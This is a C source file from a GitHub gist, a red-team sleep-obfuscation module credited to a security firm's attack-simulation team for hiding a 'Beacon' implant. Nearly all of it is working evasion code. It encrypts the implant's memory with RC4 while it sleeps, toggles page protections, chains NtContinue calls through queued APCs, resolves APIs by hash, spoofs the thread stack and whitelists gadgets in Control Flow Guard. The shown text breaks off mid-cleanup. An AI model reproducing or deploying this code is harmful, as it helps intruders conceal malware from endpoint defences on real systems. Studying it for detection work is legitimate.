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@Cracked5pider
Forked from RobinFassina-Moschini/sleep.c
Created July 7, 2022 10:05
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/*!
*
* ROGUE
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation
*
!*/
#include "Common.h"
typedef struct
{
/* APIS */
D_API( ConvertThreadToFiber );
D_API( ConvertFiberToThread );
D_API( RtlInitUnicodeString );
D_API( SwitchToFiber );
D_API( LdrUnloadDll );
D_API( CreateFiber );
D_API( DeleteFiber );
D_API( LdrLoadDll );
/* Fibers */
PVOID Master;
PVOID Slave;
PVOID Buffer;
SIZE_T Length;
ULONG Time;
} F_PARAM, *PF_PARAM;
typedef struct
{
DWORD Length;
DWORD MaximumLength;
PVOID Buffer;
} USTRING, *PUSTRING;
BOOLEAN
NTAPI
SystemFunction036(
IN PVOID Buffer,
IN ULONG Length
);
NTSTATUS
NTAPI
SystemFunction032(
IN PUSTRING Buffer,
IN PUSTRING Key
);
typedef struct
{
D_API( NtSignalAndWaitForSingleObject );
D_API( SetProcessValidCallTargets );
D_API( NtProtectVirtualMemory );
D_API( LdrGetProcedureAddress );
D_API( NtWaitForSingleObject );
D_API( WaitForSingleObjectEx );
D_API( RtlInitUnicodeString );
D_API( NtAlertResumeThread );
D_API( NtGetContextThread );
D_API( NtSetContextThread );
D_API( NtTerminateThread );
D_API( RtlInitAnsiString );
D_API( SystemFunction036 );
D_API( SystemFunction032 );
D_API( RtlExitUserThread );
D_API( NtDuplicateObject );
D_API( NtQueueApcThread );
D_API( NtCreateThreadEx );
D_API( RtlAllocateHeap );
D_API( NtCreateEvent );
D_API( NtOpenThread );
D_API( LdrUnloadDll );
D_API( RtlFreeHeap );
D_API( NtTestAlert );
D_API( LdrLoadDll );
D_API( NtContinue );
D_API( NtClose );
} API ;
#define H_API_NTSIGNALANDWAITFORSINGLEOBJECT 0x78983aed /* NtSignalAndWaitForSingleObject */
#define H_API_SETPROCESSVALIDCALLTARGETS 0x647d9236 /* SetProcessValidCallTargets */
#define H_API_NTPROTECTVIRTUALMEMORY 0x50e92888 /* NtProtectVirtualMemory */
#define H_API_LDRGETPROCEDUREADDRESS 0xfce76bb6 /* LdrGetProcedureAddress */
#define H_API_NTWAITFORSINGLEOBJECT 0xe8ac0c3c /* NtWaitForSingleObject */
#define H_API_CONVERTTHREADTOFIBER 0x826ce4e9 /* ConvertThreadToFiber */
#define H_API_CONVERTFIBERTOTHREAD 0x11b30049 /* ConvertFiberToThread */
#define H_API_RTLINITUNICODESTRING 0xef52b589 /* RtlInitUnicodeString */
#define H_API_NTALERTRESUMETHREAD 0x5ba11e28 /* NtAlertResumeThread */
#define H_API_NTSETCONTEXTTHREAD 0xffa0bf10 /* NtSetContextThread */
#define H_API_NTGETCONTEXTTHREAD 0x6d22f884 /* NtGetContextThread */
#define H_API_NTTERMINATETHREAD 0xccf58808 /* NtTerminateThread */
#define H_API_RTLINITANSISTRING 0xa0c8436d /* RtlInitAnsiSTring */
#define H_API_RTLEXITUSERTHREAD 0x2f6db5e8 /* RtlExitUserThread */
#define H_API_NTDUPLICATEOBJECT 0x4441d859 /* NtDuplicateObject */
#define H_API_NTQUEUEAPCTHREAD 0x0a6664b8 /* NtQueueApcThread */
#define H_API_NTCREATETHREADEX 0xaf18cfb0 /* NtCreateThreadEx */
#define H_API_RTLALLOCATEHEAP 0x3be94c5a /* RtlAllocateHeap */
#define H_API_SWITCHTOFIBER 0x14fc3cc2 /* SwitchToFiber */
#define H_API_NTCREATEEVENT 0x28d3233d /* NtCreateEvent */
#define H_API_LDRUNLOADDLL 0xd995c1e6 /* LdrUnloadDll */
#define H_API_NTOPENTHREAD 0x968e0cb1 /* NtOpenThread */
#define H_API_RTLFREEHEAP 0x73a9e4d7 /* RtlFreeHeap */
#define H_API_NTTESTALERT 0x858a32df /* NtTestAlert */
#define H_API_CREATEFIBER 0x687cf681 /* CreateFiber */
#define H_API_DELETEFIBER 0x99beb7a0 /* DeleteFiber */
#define H_API_LDRLOADDLL 0x9e456a43 /* LdrLoadDll */
#define H_API_NTCONTINUE 0xfc3a6c2c /* NtContinue */
#define H_API_NTCLOSE 0x40d6e69d /* NtClose */
#define H_LIB_KERNELBASE 0x03ebb38b /* kernelbase.dll */
#define H_LIB_NTDLL 0x1edab0ed /* ntdll.dll */
/*!
*
* Purpose:
*
* Adds a pointer to the CFG exception list to
* permit ROP gadgets from being marked as
* invalid.
*
!*/
static D_SEC( B ) VOID WINAPI CfgAddAddr( _In_ PVOID ImageBase, _In_ PVOID Function )
{
API Api;
CFG_CALL_TARGET_INFO Cfg;
SIZE_T Len = 0;
PVOID Kbs = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nth = NULL;
RtlSecureZeroMemory( &Api, sizeof( Api ) );
RtlSecureZeroMemory( &Cfg, sizeof( Cfg ) );
Dos = C_PTR( ImageBase );
Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew );
Len = U_PTR( ( Nth->OptionalHeader.SizeOfImage + 0x1000 - 1 ) &~( 0x1000 - 1 ) );
if ( ( Kbs = PebGetModule( H_LIB_KERNELBASE ) ) != NULL ) {
Api.SetProcessValidCallTargets = PeGetFuncEat( Kbs, H_API_SETPROCESSVALIDCALLTARGETS );
if ( Api.SetProcessValidCallTargets != NULL ) {
Cfg.Flags = CFG_CALL_TARGET_VALID;
Cfg.Offset = U_PTR( Function ) - U_PTR( ImageBase );
Api.SetProcessValidCallTargets( NtCurrentProcess(), Dos, Len, 1, &Cfg );
};
};
};
/*!
*
* Purpose:
*
* Blocks the input for a specified period of time,
* and obfuscates Beacon as well as attempts to
* spoof the thread stack.
*
!*/
static D_SEC( B ) VOID WINAPI Sleep_Call( _In_ PF_PARAM Fbr )
{
API Api;
USTRING Rc4;
USTRING Key;
ANSI_STRING Ani;
UNICODE_STRING Uni;
UCHAR Rnd[32];
SIZE_T Len = 0;
SIZE_T Prt = 0;
HANDLE Thd = NULL;
HANDLE Src = NULL;
HANDLE Evt = NULL;
LPVOID K32 = NULL;
LPVOID Adv = NULL;
LPVOID Img = NULL;
PIMAGE_DOS_HEADER Dos = NULL;
PIMAGE_NT_HEADERS Nth = NULL;
PCONTEXT Ini = NULL;
PCONTEXT Cap = NULL;
PCONTEXT Spf = NULL;
PCONTEXT Beg = NULL;
PCONTEXT Set = NULL;
PCONTEXT Enc = NULL;
PCONTEXT Gt1 = NULL;
PCONTEXT St1 = NULL;
PCONTEXT Blk = NULL;
PCONTEXT Dec = NULL;
PCONTEXT Res = NULL;
PCONTEXT St2 = NULL;
PCONTEXT End = NULL;
RtlSecureZeroMemory( &Api, sizeof( Api ) );
RtlSecureZeroMemory( &Rc4, sizeof( Rc4 ) );
RtlSecureZeroMemory( &Key, sizeof( Key ) );
RtlSecureZeroMemory( &Ani, sizeof( Ani ) );
RtlSecureZeroMemory( &Uni, sizeof( Uni ) );
Dos = C_PTR( NtCurrentPeb()->ImageBaseAddress );
Nth = C_PTR( U_PTR( Dos ) + Dos->e_lfanew );
Img = C_PTR( Fbr->Buffer );
Len = U_PTR( Fbr->Length );
Api.NtSignalAndWaitForSingleObject = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTSIGNALANDWAITFORSINGLEOBJECT );
Api.NtProtectVirtualMemory = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTPROTECTVIRTUALMEMORY );
Api.LdrGetProcedureAddress = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_LDRGETPROCEDUREADDRESS );
Api.NtWaitForSingleObject = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTWAITFORSINGLEOBJECT );
Api.RtlInitUnicodeString = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLINITUNICODESTRING );
Api.NtAlertResumeThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTALERTRESUMETHREAD );
Api.NtGetContextThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTGETCONTEXTTHREAD );
Api.NtSetContextThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTSETCONTEXTTHREAD );
Api.NtTerminateThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTTERMINATETHREAD );
Api.RtlInitAnsiString = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLINITANSISTRING );
Api.RtlExitUserThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLEXITUSERTHREAD );
Api.NtDuplicateObject = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTDUPLICATEOBJECT );
Api.NtQueueApcThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTQUEUEAPCTHREAD );
Api.NtCreateThreadEx = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCREATETHREADEX );
Api.RtlAllocateHeap = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLALLOCATEHEAP );
Api.NtCreateEvent = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCREATEEVENT );
Api.NtOpenThread = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTOPENTHREAD );
Api.LdrUnloadDll = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_LDRUNLOADDLL );
Api.RtlFreeHeap = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_RTLFREEHEAP );
Api.NtTestAlert = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTTESTALERT );
Api.LdrLoadDll = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_LDRLOADDLL );
Api.NtContinue = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCONTINUE );
Api.NtClose = PeGetFuncEat( PebGetModule( H_LIB_NTDLL ), H_API_NTCLOSE );
Api.RtlInitUnicodeString( &Uni, C_PTR( G_PTR( L"kernel32.dll" ) ) );
Api.LdrLoadDll( NULL, 0, &Uni, &K32 );
Api.RtlInitUnicodeString( &Uni, C_PTR( G_PTR( L"advapi32.dll" ) ) );
Api.LdrLoadDll( NULL, 0, &Uni, &Adv );
if ( K32 != NULL && Adv != NULL ) {
Api.RtlInitAnsiString( &Ani, C_PTR( G_PTR( "WaitForSingleObjectEx" ) ) );
Api.LdrGetProcedureAddress( K32, &Ani, 0, &Api.WaitForSingleObjectEx );
Api.RtlInitAnsiString( &Ani, C_PTR( G_PTR( "SystemFunction032" ) ) );
Api.LdrGetProcedureAddress( Adv, &Ani, 0, &Api.SystemFunction032 );
Api.RtlInitAnsiString( &Ani, C_PTR( G_PTR( "SystemFunction036" ) ) );
Api.LdrGetProcedureAddress( Adv, &Ani, 0, &Api.SystemFunction036 );
Api.SystemFunction036( &Rnd, sizeof( Rnd ) );
Key.Buffer = &Rnd;
Key.Length = Key.MaximumLength = sizeof( Rnd );
Rc4.Buffer = C_PTR( Fbr->Buffer );
Rc4.Length = Rc4.MaximumLength = U_PTR( Fbr->Length );
if ( NT_SUCCESS( Api.NtCreateEvent( &Evt, EVENT_ALL_ACCESS, NULL, SynchronizationEvent, FALSE ) ) ) {
if ( NT_SUCCESS( Api.NtCreateThreadEx( &Thd, THREAD_ALL_ACCESS, NULL, NtCurrentProcess(), C_PTR( U_PTR( Dos ) + Nth->OptionalHeader.AddressOfEntryPoint ), NULL, TRUE, 0, 0x1000 * 20, 0x1000 * 20, NULL ) ) ) {
Ini = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Ini == NULL ) {
goto Leave;
};
Cap = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Cap == NULL ) {
goto Leave;
};
Spf = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Spf == NULL ) {
goto Leave;
};
Beg = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Beg == NULL ) {
goto Leave;
};
Set = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Set == NULL ) {
goto Leave;
};
Enc = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Enc == NULL ) {
goto Leave;
};
Gt1 = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Gt1 == NULL ) {
goto Leave;
};
St1 = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( St1 == NULL ) {
goto Leave;
};
Blk = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Blk == NULL ) {
goto Leave;
};
Dec = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Dec == NULL ) {
goto Leave;
};
Res = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( Res == NULL ) {
goto Leave;
};
St2 = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( St2 == NULL ) {
goto Leave;
};
End = Api.RtlAllocateHeap( NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, sizeof( CONTEXT ) );
if ( End == NULL ) {
goto Leave;
};
Ini->ContextFlags = CONTEXT_FULL;
Cap->ContextFlags = CONTEXT_FULL;
Spf->ContextFlags = CONTEXT_FULL;
Beg->ContextFlags = CONTEXT_FULL;
Set->ContextFlags = CONTEXT_FULL;
Enc->ContextFlags = CONTEXT_FULL;
Gt1->ContextFlags = CONTEXT_FULL;
St1->ContextFlags = CONTEXT_FULL;
Blk->ContextFlags = CONTEXT_FULL;
Dec->ContextFlags = CONTEXT_FULL;
Res->ContextFlags = CONTEXT_FULL;
St2->ContextFlags = CONTEXT_FULL;
End->ContextFlags = CONTEXT_FULL;
if ( NT_SUCCESS( Api.NtDuplicateObject( NtCurrentProcess(), NtCurrentThread(), NtCurrentProcess(), &Src, THREAD_ALL_ACCESS, 0, 0 ) ) ) {
if ( NT_SUCCESS( Api.NtGetContextThread( Thd, Ini ) ) ) {
__builtin_memcpy( Beg, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Set, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Enc, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Gt1, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( St1, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Blk, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Dec, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( Res, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( St2, Ini, sizeof( CONTEXT ) );
__builtin_memcpy( End, Ini, sizeof( CONTEXT ) );
#if defined( _WIN64 )
Beg->ContextFlags = CONTEXT_FULL;
Beg->Rip = U_PTR( Api.NtWaitForSingleObject );
Beg->Rsp -= U_PTR( 0x1000 * 13 );
Beg->Rcx = U_PTR( Evt );
Beg->Rdx = U_PTR( FALSE );
Beg->R8 = U_PTR( NULL );
*( ULONG_PTR volatile * )( Beg->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
Set->ContextFlags = CONTEXT_FULL;
Set->Rip = U_PTR( Api.NtProtectVirtualMemory );
Set->Rsp -= U_PTR( 0x1000 * 12 );
Set->Rcx = U_PTR( NtCurrentProcess() );
Set->Rdx = U_PTR( & Img );
Set->R8 = U_PTR( & Len );
Set->R9 = U_PTR( PAGE_READWRITE );
*( ULONG_PTR volatile * )( Set->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Set->Rsp + ( sizeof( ULONG_PTR ) * 0x5 ) ) = U_PTR( &Prt );
Enc->ContextFlags = CONTEXT_FULL;
Enc->Rip = U_PTR( Api.SystemFunction032 );
Enc->Rsp -= U_PTR( 0x1000 * 11 );
Enc->Rcx = U_PTR( &Rc4 );
Enc->Rdx = U_PTR( &Key );
*( ULONG_PTR volatile * )( Enc->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
Gt1->ContextFlags = CONTEXT_FULL;
Gt1->Rip = U_PTR( Api.NtGetContextThread );
Gt1->Rsp -= U_PTR( 0x1000 * 10 );
Gt1->Rcx = U_PTR( Src );
Gt1->Rdx = U_PTR( Cap );
*( ULONG_PTR volatile * )( Gt1->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
St1->ContextFlags = CONTEXT_FULL;
St1->Rip = U_PTR( Api.NtSetContextThread );
St1->Rsp -= U_PTR( 0x1000 * 9 );
St1->Rcx = U_PTR( Src );
St1->Rdx = U_PTR( Spf );
*( ULONG_PTR volatile * )( St1->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
Blk->ContextFlags = CONTEXT_FULL;
Blk->Rip = U_PTR( Api.WaitForSingleObjectEx );
Blk->Rsp -= U_PTR( 0x1000 * 8 );
Blk->Rcx = U_PTR( Src );
Blk->Rdx = U_PTR( Fbr->Time );
Blk->R8 = U_PTR( FALSE );
*( ULONG_PTR volatile * )( Blk->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
Dec->ContextFlags = CONTEXT_FULL;
Dec->Rip = U_PTR( Api.SystemFunction032 );
Dec->Rsp -= U_PTR( 0x1000 * 7 );
Dec->Rcx = U_PTR( &Rc4 );
Dec->Rdx = U_PTR( &Key );
*( ULONG_PTR volatile * )( Dec->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
Res->ContextFlags = CONTEXT_FULL;
Res->Rip = U_PTR( Api.NtProtectVirtualMemory );
Res->Rsp -= U_PTR( 0x1000 * 6 );
Res->Rcx = U_PTR( NtCurrentProcess() );
Res->Rdx = U_PTR( & Img );
Res->R8 = U_PTR( & Len );
Res->R9 = U_PTR( PAGE_EXECUTE_READ );
*( ULONG_PTR volatile * )( Res->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Res->Rsp + ( sizeof( ULONG_PTR ) * 0x5 ) ) = U_PTR( &Prt );
St2->ContextFlags = CONTEXT_FULL;
St2->Rip = U_PTR( Api.NtSetContextThread );
St2->Rsp -= U_PTR( 0x1000 * 5 );
St2->Rcx = U_PTR( Src );
St2->Rdx = U_PTR( Cap );
*( ULONG_PTR volatile * )( St2->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
End->ContextFlags = CONTEXT_FULL;
End->Rip = U_PTR( Api.RtlExitUserThread );
End->Rsp -= U_PTR( 0x1000 * 4 );
End->Rcx = U_PTR( ERROR_SUCCESS );
*( ULONG_PTR volatile * )( Beg->Rsp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
#else
Beg->ContextFlags = CONTEXT_FULL;
Beg->Eip = U_PTR( Api.NtWaitForSingleObject );
Beg->Esp -= U_PTR( 0x1000 * 13 );
*( ULONG_PTR volatile * )( Beg->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Beg->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( Evt );
*( ULONG_PTR volatile * )( Beg->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( FALSE );
*( ULONG_PTR volatile * )( Beg->Esp + ( sizeof( ULONG_PTR ) * 0x3 ) ) = U_PTR( NULL );
Set->ContextFlags = CONTEXT_FULL;
Set->Eip = U_PTR( Api.NtProtectVirtualMemory );
Set->Esp -= U_PTR( 0x1000 * 12 );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( NtCurrentProcess() );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( & Img );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x3 ) ) = U_PTR( & Len );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x4 ) ) = U_PTR( PAGE_READWRITE );
*( ULONG_PTR volatile * )( Set->Esp + ( sizeof( ULONG_PTR ) * 0x5 ) ) = U_PTR( & Prt );
Enc->ContextFlags = CONTEXT_FULL;
Enc->Eip = U_PTR( Api.SystemFunction032 );
Enc->Esp -= U_PTR( 0x1000 * 11 );
*( ULONG_PTR volatile * )( Enc->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Enc->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( & Rc4 );
*( ULONG_PTR volatile * )( Enc->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( & Key );
Gt1->ContextFlags = CONTEXT_FULL;
Gt1->Eip = U_PTR( Api.NtGetContextThread );
Gt1->Esp -= U_PTR( 0x1000 * 10 );
*( ULONG_PTR volatile * )( Gt1->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Gt1->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( Src );
*( ULONG_PTR volatile * )( Gt1->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( Cap );
St1->ContextFlags = CONTEXT_FULL;
St1->Eip = U_PTR( Api.NtSetContextThread );
St1->Esp -= U_PTR( 0x1000 * 9 );
*( ULONG_PTR volatile * )( St1->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( St1->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( Src );
*( ULONG_PTR volatile * )( St1->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( Spf );
Blk->ContextFlags = CONTEXT_FULL;
Blk->Eip = U_PTR( Api.WaitForSingleObjectEx );
Blk->Esp -= U_PTR( 0x1000 * 8 );
*( ULONG_PTR volatile * )( Blk->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Blk->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( Src );
*( ULONG_PTR volatile * )( Blk->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( Fbr->Time );
*( ULONG_PTR volatile * )( Blk->Esp + ( sizeof( ULONG_PTR ) * 0x3 ) ) = U_PTR( FALSE );
Dec->ContextFlags = CONTEXT_FULL;
Dec->Eip = U_PTR( Api.SystemFunction032 );
Dec->Esp -= U_PTR( 0x1000 * 7 );
*( ULONG_PTR volatile * )( Dec->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Dec->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( & Rc4 );
*( ULONG_PTR volatile * )( Dec->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( & Key );
Res->ContextFlags = CONTEXT_FULL;
Res->Eip = U_PTR( Api.NtProtectVirtualMemory );
Res->Esp -= U_PTR( 0x1000 * 6 );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( NtCurrentProcess() );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( & Img );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x3 ) ) = U_PTR( & Len );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x4 ) ) = U_PTR( PAGE_EXECUTE_READ );
*( ULONG_PTR volatile * )( Res->Esp + ( sizeof( ULONG_PTR ) * 0x5 ) ) = U_PTR( & Prt );
St2->ContextFlags = CONTEXT_FULL;
St2->Eip = U_PTR( Api.NtSetContextThread );
St2->Esp -= U_PTR( 0x1000 * 5 );
*( ULONG_PTR volatile * )( St2->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( St2->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( Src );
*( ULONG_PTR volatile * )( St2->Esp + ( sizeof( ULONG_PTR ) * 0x2 ) ) = U_PTR( Cap );
End->ContextFlags = CONTEXT_FULL;
End->Eip = U_PTR( Api.RtlExitUserThread );
End->Esp -= U_PTR( 0x1000 * 4 );
*( ULONG_PTR volatile * )( End->Esp + ( sizeof( ULONG_PTR ) * 0x0 ) ) = U_PTR( Api.NtTestAlert );
*( ULONG_PTR volatile * )( End->Esp + ( sizeof( ULONG_PTR ) * 0x1 ) ) = U_PTR( ERROR_SUCCESS );
#endif
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Beg ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Set ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Enc ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Gt1 ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( St1 ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Blk ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Dec ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( Res ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( St2 ), FALSE, NULL ) ) ) goto Leave;
if ( ! NT_SUCCESS( Api.NtQueueApcThread( Thd, Api.NtContinue, C_PTR( End ), FALSE, NULL ) ) ) goto Leave;
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtContinue );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtTestAlert );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtSetContextThread );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtGetContextThread );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.RtlExitUserThread );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtWaitForSingleObject );
CfgAddAddr( PebGetModule( H_LIB_NTDLL ), Api.NtProtectVirtualMemory );
if ( NT_SUCCESS( Api.NtAlertResumeThread( Thd, NULL ) ) ) {
Spf->ContextFlags = CONTEXT_FULL;
#if defined( _WIN64 )
Spf->Rip = U_PTR( Api.WaitForSingleObjectEx );
Spf->Rsp = U_PTR( NtCurrentTeb()->NtTib.StackBase );
#else
Spf->Eip = U_PTR( Api.WaitForSingleObjectEx );
Spf->Esp = U_PTR( NtCurrentTeb()->NtTib.StackBase );
#endif
Api.NtSignalAndWaitForSingleObject( Evt, Thd, FALSE, NULL );
};
};
};
};
};
};
Leave:
if ( End != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, End );
End = NULL;
};
if ( St2 != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, St2 );
St2 = NULL;
};
if ( Res != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Res );
Res = NULL;
};
if ( Dec != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Dec );
Dec = NULL;
};
if ( Blk != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Blk );
Blk = NULL;
};
if ( St1 != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, St1 );
St1 = NULL;
};
if ( Gt1 != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Gt1 );
Gt1 = NULL;
};
if ( Enc != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Enc );
Enc = NULL;
};
if ( Set != NULL ) {
Api.RtlFreeHeap( NtCurrentPeb()->ProcessHeap, 0, Set );
Set = NULL;
};
if ( Beg != NULL ) {
